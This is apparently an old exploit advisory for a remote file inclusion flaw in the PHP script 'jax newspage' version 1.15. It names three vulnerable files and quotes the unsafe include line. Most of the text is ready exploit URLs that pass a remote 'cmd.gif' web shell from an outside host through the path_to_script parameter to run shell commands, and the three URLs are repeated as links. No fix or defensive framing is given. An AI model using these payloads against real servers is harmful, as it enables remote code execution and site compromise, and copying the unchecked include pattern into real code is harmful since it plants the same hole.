# BiyoSecurity.Org & SecurityWall.Org # Download : http://www.jtr.de/scripting/php/newspage/newspage%20v1.15.zip # Script Name : jax newspage # Version : 1.15 # Risk : high # Regard : RMx # Thanx : Liz0zim , KorsaN , DreamLord , TR_IP # Vulnerable Files : /admin/index.php /admin/news.admin.php /newsarchive.php # Vulnerable code : // Global variables require ( $path_to_script."globals.inc.php"); # Exploit : http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.com/cmd.gif?&cmd=ls http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.com/cmd.gif?&cmd=ls http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://site.com/cmd.gif?&cmd=ls
![http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.com/cmd.gif?&cmd=ls](http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.com/cmd.gif?&cmd=ls){kind=link}
![http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.com/cmd.gif?&cmd=ls](http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.com/cmd.gif?&cmd=ls){kind=link}
![http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://site.com/cmd.gif?&cmd=ls](http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://site.com/cmd.gif?&cmd=ls){kind=link}
